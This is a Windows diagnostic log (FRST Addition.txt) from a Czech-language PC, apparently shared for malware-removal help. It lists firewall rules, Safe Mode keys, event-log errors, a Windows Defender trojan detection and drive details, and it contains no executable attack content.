2018-04-12 00:34 - 2018-04-12 00:34 - 000472064 _____ () C:\Windows\ShellExperiences\TileControl.dll
2018-12-12 09:01 - 2018-11-09 03:17 - 002759680 _____ () C:\Windows\ShellComponents\TaskFlowUI.dll
2019-01-09 12:59 - 2019-01-01 07:42 - 002185728 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2018-12-14 19:16 - 2018-12-14 19:21 - 000182272 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.36.52.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\adawareantivirusservice => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\adawareantivirusservice => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="1"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


There are 7865 more sites.



==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-195099987-321758953-278711717-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\ulol\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)

==================== MSCONFIG/TASK MANAGER disabled items ==

If an entry is included in the fixlist, it will be removed.

HKU\S-1-5-21-195099987-321758953-278711717-1001\...\StartupApproved\Run: => "BlueStacks Agent"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\StartupApproved\Run: => "OneDrive"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [UDP Query User{680A3119-9C48-4A9D-8F3E-DCBBF626867E}C:\program files (x86)\kingdom come deliverance\bin\win64\kingdomcome.exe] => (Block) C:\program files (x86)\kingdom come deliverance\bin\win64\kingdomcome.exe
FirewallRules: [TCP Query User{9CD32ACD-CFD6-45A4-B4DF-C9EF3A4052CB}C:\program files (x86)\kingdom come deliverance\bin\win64\kingdomcome.exe] => (Block) C:\program files (x86)\kingdom come deliverance\bin\win64\kingdomcome.exe
FirewallRules: [UDP Query User{0C967B64-CE0C-456C-B174-8178F48D6104}C:\program files (x86)\warcraft iii\war3.exe] => (Allow) C:\program files (x86)\warcraft iii\war3.exe
FirewallRules: [TCP Query User{D803BB9E-7542-4BAA-920B-DAA1792A535A}C:\program files (x86)\warcraft iii\war3.exe] => (Allow) C:\program files (x86)\warcraft iii\war3.exe
FirewallRules: [{74BBCAA8-0F85-4E7C-AB86-EBFEFC54D83F}] => (Allow) C:\Program Files (x86)\Electronic Arts\The Battle for Middle-earth (tm) II\game.dat
FirewallRules: [{EF7CD7A6-B6AD-4289-952D-49D310DF7E02}] => (Allow) C:\Program Files (x86)\Electronic Arts\The Battle for Middle-earth (tm) II\game.dat
FirewallRules: [{1F3F6959-FCD3-404A-95E2-17B36DCB540F}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{3B79ECD1-9CEC-4E00-B545-A2262DDC26BA}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [UDP Query User{6C071EF6-C6C0-4D88-B919-ACD84451EF09}C:\program files (x86)\samsung\easy printer manager\ids.application.exe] => (Allow) C:\program files (x86)\samsung\easy printer manager\ids.application.exe
FirewallRules: [TCP Query User{01339B68-9EF4-4C99-8E75-3C99DCBE8EF1}C:\program files (x86)\samsung\easy printer manager\ids.application.exe] => (Allow) C:\program files (x86)\samsung\easy printer manager\ids.application.exe
FirewallRules: [{418D3690-1654-4D36-9C65-E4881416F186}] => (Allow) C:\Program Files (x86)\Samsung\Easy Document Creator\EDC.exe
FirewallRules: [{FD052E8D-5947-4005-9113-A4B0DA632966}] => (Allow) C:\Program Files (x86)\Samsung\Easy Document Creator\EDC.exe
FirewallRules: [{865BC1B9-BDE3-408E-923A-336E538AB506}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ScanCDLM.exe
FirewallRules: [{2AC8C8A2-451C-4D9E-935F-4999B88AF985}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ScanCDLM.exe
FirewallRules: [{2BA6C829-EF73-4535-A7F7-CA54E9CB4E93}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ICCUpdater.exe
FirewallRules: [{2221AC8E-0468-49A9-A0AE-489AC315ADF2}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ICCUpdater.exe
FirewallRules: [{BA30716E-B3D5-4765-BFD4-2BFAB06F3A6E}] => (Allow) C:\Windows\twain_32\Samsung\SCX3400\SCNSearch\USDAgent.exe
FirewallRules: [{C5027FDD-ABB1-4575-9FEB-30CEF15A0174}] => (Allow) C:\Windows\twain_32\Samsung\SCX3400\SCNSearch\USDAgent.exe
FirewallRules: [{44620DE5-6297-4A22-853E-0F6BE8BC6C95}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\CDAS2PC\Scan2PCNotify.exe
FirewallRules: [{0125CC0F-2664-4DDC-8773-036A1480E45E}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\CDAS2PC\ScanProcess.exe
FirewallRules: [{10FEC841-DB04-4EC4-B51B-926818D78CEF}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\CDAS2PC\CDAS2PC.exe
FirewallRules: [{1B2BD275-5E88-4056-97F9-B9F00CEF4644}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\uninstall.exe
FirewallRules: [{DE602CDB-BEB2-49D6-8108-72A718061FA8}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\IDSAlert.exe
FirewallRules: [{8D7B0C18-C2F1-4044-924F-CB7ABE7F31C5}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\OrderSupplies.exe
FirewallRules: [{65B2ED45-5E31-4CC1-92C6-8038109E3170}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\IDS.Application.exe
FirewallRules: [{8AB3011A-5645-45FF-A547-B893F1D2B6BF}] => (Allow) C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
FirewallRules: [{B4F4E17F-C2EF-4854-AD4C-8B2708E8AC1F}] => (Allow) C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
FirewallRules: [{6FA07099-4EA9-452A-9FA8-995B59ECAE90}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [UDP Query User{AC472FF0-E9BA-477F-8C59-E0CF6E26B1F6}C:\program files (x86)\far cry primal\bin\fcprimal.exe] => (Allow) C:\program files (x86)\far cry primal\bin\fcprimal.exe
FirewallRules: [TCP Query User{29EB2B2E-4FA2-4FA9-ADB8-FB3EA85EE2C0}C:\program files (x86)\far cry primal\bin\fcprimal.exe] => (Allow) C:\program files (x86)\far cry primal\bin\fcprimal.exe
FirewallRules: [{1B152717-C9E6-4543-87BB-5D4E311A0B0F}] => (Allow) C:\Users\ulol\AppData\Roaming\uTorrent\utorrent.exe
FirewallRules: [{100C66FD-2DCC-4B01-8D14-02FFD2C069A9}] => (Allow) C:\Users\ulol\AppData\Roaming\uTorrent\utorrent.exe
FirewallRules: [UDP Query User{632511C2-DDFC-4CEF-8C55-A82E8EB56B2A}C:\users\ulol\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\ulol\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [TCP Query User{809F3FAE-2B59-440B-8219-81CB5996542E}C:\users\ulol\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\ulol\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [{58ECFD65-9A3C-47BA-AB19-B2A27BACEC84}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{3E457CE4-B263-445B-916E-10B85CEBE320}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [UDP Query User{80F90ED6-45B2-4117-84CF-FBCBE2F06D08}C:\program files (x86)\far cry primal\bin\fcprimal.exe] => (Allow) C:\program files (x86)\far cry primal\bin\fcprimal.exe
FirewallRules: [TCP Query User{5DAE795F-7DD0-4F03-A957-23178027EC7F}C:\program files (x86)\far cry primal\bin\fcprimal.exe] => (Allow) C:\program files (x86)\far cry primal\bin\fcprimal.exe
FirewallRules: [{76359A4C-3A58-4EE1-A908-4ADE16275DBF}] => (Allow) C:\Program Files (x86)\Winamp\winamp.exe
FirewallRules: [{0FF7A781-7AB7-4397-B417-0E5504F6C62C}] => (Allow) C:\Program Files (x86)\Winamp\winamp.exe
FirewallRules: [UDP Query User{946CEECC-8221-41F2-AF67-5BF9A2797A88}C:\users\ulol\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\ulol\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [TCP Query User{C8A027E8-6DAB-4F49-9015-1E2037DE8C23}C:\users\ulol\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\ulol\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [{DFF9485B-1726-4727-ACCD-1E22F49A5F76}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{B0516401-11A3-4DCC-A5CB-691CF7FA910D}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A8991BE6-8068-4C4F-8482-08861EAF061C}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{3144E693-40E1-40BA-AD59-C5B0752F98E1}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{DE99C12C-1421-4D07-B3C1-5D2D854A4EFD}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe
FirewallRules: [{76B4001E-0ACD-45A3-A91A-18D739417786}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe
FirewallRules: [{80E9FEE1-E9D6-415C-9E57-42C9395DCACF}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe
FirewallRules: [{420EDF67-B57A-4B23-B6AF-93ACAC9F0A06}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe
FirewallRules: [{5429A441-852D-4C25-B0E9-E8FCDF25881D}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{36A60251-4723-4B9D-95BF-290C0B9D73F2}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{F0DBA328-0448-42C9-81D0-3B92A1739F2E}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [TCP Query User{FCDD228F-1357-42C4-A39B-A63F1B07F474}C:\users\ulol\desktop\far cry 1 bez instalace (r) pc game\bin32\farcry.exe] => (Allow) C:\users\ulol\desktop\far cry 1 bez instalace (r) pc game\bin32\farcry.exe
FirewallRules: [UDP Query User{6D3942CA-B064-4120-BD2B-6B02B318653B}C:\users\ulol\desktop\far cry 1 bez instalace (r) pc game\bin32\farcry.exe] => (Allow) C:\users\ulol\desktop\far cry 1 bez instalace (r) pc game\bin32\farcry.exe
FirewallRules: [{BF4317CC-2B83-4958-8B97-1061A97E93EE}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
FirewallRules: [{BD7AE586-6CAC-4892-B735-4CA80B0D3D62}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
FirewallRules: [{8C18F3D0-FC27-424D-B0B3-02980A9FA42C}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{4D7D2769-DF79-481A-9CBF-F959AED5BC99}] => (Allow) C:\WINDOWS\SysWOW64\msiexec.exe
FirewallRules: [{35A3D09F-CE17-4CA2-94B6-F4247ED5F3EC}] => (Allow) C:\Users\ulol\AppData\Roaming\MezyMLATmn.exe
FirewallRules: [{226B719A-7399-44FC-8195-1ECE66B04A97}] => (Allow) C:\WINDOWS\SysWOW64\xeAwY.exe
FirewallRules: [{B89F5B34-5FB4-44EA-80BB-D163442646A0}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{E2EDB791-F173-4372-AC7B-034B9710C230}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{BC9DADB6-8473-43D2-96FD-FD726E9BB013}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{193F2B1F-0DA9-4711-887F-3ED626016202}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{9D2B0873-BC44-4EDC-95A6-643FB1055664}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{CF7AEC5F-4D63-4972-AC11-1DCE22095F46}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{823D3430-D5F0-4AD2-BCF8-BB4839A12AB9}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{376867FA-3140-4A61-9CBA-168DCE9B8216}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{B6D40083-1F4E-477A-9015-8DC7E9A6A3C1}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{7E62B397-4825-42F8-9A15-E6ED471E0842}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{17289A97-0812-45DA-B9F8-824BEEE7D45C}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{BC971134-8067-4B9F-9EB2-3A04D2DD62F1}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{CE24B0E2-FC9C-4416-BF6D-2E4943991655}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{C521D663-E846-45B1-B592-DEB0438CD546}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{4D14BB88-E721-4A09-9B0C-45C52C06B6A0}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{98AE550D-AE3C-4286-907C-A78F1169EAD6}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{D55FDDCB-BD31-40A3-9B65-005FC38D9A7B}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{DF498C8A-17E0-4FE0-8B77-16FDB398E8E6}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{987D7429-B9D0-4E08-A619-DA0B50A3E051}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{05AFB857-23D0-40D7-9E9E-EBD50D6AF0BC}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{7E6397DA-11FF-495D-BBDA-EDB0E1F8C2B7}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{70248E8A-4E3E-49D2-8A4B-184E4DC26B78}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{7D8251D0-28ED-4EDE-9545-D62A8457EEBF}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{D8165305-DF6F-458E-B77A-D66DD8119582}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{F49A626E-6773-48DD-B529-1D2CABA6DB40}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{2BB23635-3555-4760-8329-9C3E6BEC50D9}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{5EF6B97B-6CC2-4D6D-A2FD-2170143E542C}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{CC44B33F-2809-487C-8B49-0064BD70855A}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{73400E7A-F989-43CB-84D0-D1EA511B25F9}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{380E9148-9BA9-482E-A41C-82E22059545A}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe

==================== Restore Points =========================

07-01-2019 21:54:57 Naplánovaný kontrolní bod
11-01-2019 13:06:14 Operace obnovení

==================== Faulty Device Manager Devices =============

Name: Realtek High Definition Audio
Description: Realtek High Definition Audio
Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318}
Manufacturer: Realtek
Service: IntcAzAudAddService
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

Name: Intel(R) Display Audio
Description: Intel(R) Display Audio
Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318}
Manufacturer: Intel(R) Corporation
Service: IntcDAud
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver


==================== Event log errors: =========================

Application errors:
==================
Error: (01/11/2019 07:21:15 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Program FRST64.exe verze 28.9.2018.0 přestal spolupracovat se systémem Windows a byl ukončen. Chcete-li zjistit, zda je k dispozici více informací o tomto problému, vyhledejte historii problému v ovládacím panelu Zabezpečení a údržba.

ID procesu: 81c

Čas spuštění: 01d4a9da621b2079

Čas ukončení: 4294967295

Cesta k aplikaci: C:\Users\ulol\Desktop\FRST64.exe

ID hlášení: 187dcaa4-a6f5-43e1-8e70-26011cd6b2cf

Úplný název balíčku s chybou: 

ID aplikace související s balíčkem s chybou:

Error: (01/11/2019 07:17:54 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Program chrome.exe verze 71.0.3578.98 přestal spolupracovat se systémem Windows a byl ukončen. Chcete-li zjistit, zda je k dispozici více informací o tomto problému, vyhledejte historii problému v ovládacím panelu Zabezpečení a údržba.

ID procesu: 216c

Čas spuštění: 01d4a9d8261c0564

Čas ukončení: 4294967295

Cesta k aplikaci: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

ID hlášení: d70709be-36cf-4a36-8147-5f1c494ffb79

Úplný název balíčku s chybou: 

ID aplikace související s balíčkem s chybou:

Error: (01/11/2019 07:09:55 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu  na SECURITY_PRODUCT_STATE_OFF došlo k chybě.

Error: (01/11/2019 07:09:54 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu  na SECURITY_PRODUCT_STATE_OFF došlo k chybě.

Error: (01/11/2019 07:09:53 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu  na SECURITY_PRODUCT_STATE_OFF došlo k chybě.

Error: (01/11/2019 07:09:51 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu  na SECURITY_PRODUCT_STATE_OFF došlo k chybě.

Error: (01/11/2019 07:09:50 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu  na SECURITY_PRODUCT_STATE_OFF došlo k chybě.

Error: (01/11/2019 07:09:49 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu  na SECURITY_PRODUCT_STATE_OFF došlo k chybě.


System errors:
=============
Error: (01/11/2019 07:41:52 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru: 
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/11/2019 07:41:47 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru: 
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/11/2019 07:41:38 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru: 
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/11/2019 07:41:32 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru: 
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/11/2019 07:41:26 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru: 
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/11/2019 07:41:16 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru: 
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/11/2019 07:41:04 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru: 
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/11/2019 07:40:42 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru: 
{DD522ACC-F821-461A-A407-50B198B896DC}


Windows Defender:
===================================
Date: 2019-01-11 13:05:02.337
Description: 
Prohledávání Antivirová ochrana v programu Windows Defender bylo zastaveno před dokončením.
ID prohledávání: {C7624ED8-55B8-4C11-A697-F488F786E077}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Úplné prohledávání
Uživatel: DESKTOP-VBSMI5O\Martin

Date: 2019-01-10 19:36:54.115
Description: 
Prohledávání Antivirová ochrana v programu Windows Defender bylo zastaveno před dokončením.
ID prohledávání: {3AEA90E1-AC2C-415F-92A2-FF1B00481283}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2019-01-10 19:23:18.123
Description: 
Prohledávání Antivirová ochrana v programu Windows Defender bylo zastaveno před dokončením.
ID prohledávání: {B5282268-AE53-47D3-948C-ECE9541D4170}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2019-01-10 19:01:02.490
Description: 
Prohledávání Antivirová ochrana v programu Windows Defender bylo zastaveno před dokončením.
ID prohledávání: {B8CB204C-EF17-40F0-8A73-72ED9379FE3F}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2019-01-10 17:30:21.507
Description: 
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:JS/Redirector!rfn&threatid=2147692383&enterprise=0
Název: Trojan:JS/Redirector!rfn
ID: 2147692383
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Users\ulol\AppData\Roaming\product.dll
Původ zjišťování: Místní počítač
Typ zjišťování: Konkrétní
Zdroj zjišťování: Ochrana v reálném čase
Uživatel: DESKTOP-VBSMI5O\Martin
Název procesu: C:\Users\ulol\AppData\Local\Temp\is-7QKIU.tmp\installer.tmp
Verze podpisu: AV: 1.283.2606.0, AS: 1.283.2606.0, NIS: 1.283.2606.0
Verze modulu: AM: 1.1.15500.2, NIS: 1.1.15500.2

Date: 2019-01-11 13:46:01.063
Description: 
Funkce Ochrana v reálném čase u prohledávání Antivirová ochrana v programu Windows Defender zjistila chybu a došlo k jejímu selhání.
Funkce: Při přístupu
Kód chyby: 0x8007043c
Popis chyby: Tuto službu nelze spustit v nouzovém režimu.  
Důvod: Antimalwarová ochrana přestala z neznámých důvodů fungovat. V některých případech lze tento problém vyřešit restartováním služby.

CodeIntegrity:
===================================

Date: 2019-01-11 19:23:44.957
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 19:02:52.546
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 18:50:49.237
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 18:35:34.802
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 18:28:40.259
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 17:56:09.418
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 15:33:10.017
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 15:28:30.614
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info =========================== 

Processor: Intel(R) Core(TM) i7-3630QM CPU @ 2.40GHz
Percentage of memory in use: 21%
Total physical RAM: 6035.48 MB
Available physical RAM: 4739.77 MB
Total Virtual: 6995.48 MB
Available Virtual: 5796.36 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:902.98 GB) (Free:594.78 GB) NTFS

\\?\Volume{7531e688-2fc9-4f9c-adf4-293c168a2c7e}\ (Windows RE tools) (Fixed) (Total:0.49 GB) (Free:0.17 GB) NTFS
\\?\Volume{ab46e8c9-01c0-4456-83ee-e16ccf8e90a8}\ () (Fixed) (Total:0.84 GB) (Free:0.33 GB) NTFS
\\?\Volume{d5549186-e4a3-4c4f-91cf-dc8b1b6f6540}\ () (Fixed) (Total:0.44 GB) (Free:0.42 GB) NTFS
\\?\Volume{2b981f92-3351-4f9f-b83d-9d44c784b14a}\ () (Fixed) (Total:0.34 GB) (Free:0.31 GB) NTFS
\\?\Volume{44e90043-829f-4bc5-b6bf-38a1d1519b56}\ (SAMSUNG_REC2) (Fixed) (Total:25 GB) (Free:0.91 GB) NTFS
\\?\Volume{318b7a2b-74b1-41bd-4173-636c65706975}\ (SAMSUNG_REC) (Fixed) (Total:1 GB) (Free:0.28 GB) FAT32
\\?\Volume{fe517963-fc07-4878-9792-efa4b3e98e24}\ (SYSTEM) (Fixed) (Total:0.29 GB) (Free:0.24 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 4EC8E0BC)

Partition: GPT.

==================== End of Addition.txt ============================